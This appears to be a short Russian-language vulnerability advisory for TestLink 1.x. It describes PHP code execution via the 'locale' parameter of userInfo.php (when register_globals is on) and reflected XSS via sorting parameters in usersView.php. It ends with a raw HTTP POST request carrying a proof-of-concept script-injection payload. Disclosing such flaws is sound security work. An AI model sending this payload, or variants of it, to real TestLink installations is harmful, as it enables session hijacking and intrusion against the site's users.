Программа: TestLink 1.x
Уязвимость позволяет удаленному пользователю осуществить XSS атаку и
выполнить произвольный PHP сценарий на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "locale" сценарием lib/usermanagement/userInfo.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение
опции "register_globals" в конфигурационном файле PHP.
2) Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "order_by_role_dir", "order_by_login_dir", и "user_order_by"
сценарием lib/usermanagement/usersView.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
POST /testlink/lib/usermanagement/usersView.php HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR
1.1.4322)
Host: x.x.x.x
Content-Length: 146
Cookie: PHPSESSID=8ea021778858f826c5aab8be8f38868c;TL_lastTestProjectForUserID_1=2381
Connection: Close
Pragma: no-cache
operation=order_by_role&order_by_role_dir=asc&order_by_login_dir=1> ">alert(726367128870)%3B&user_order_by=order_by_login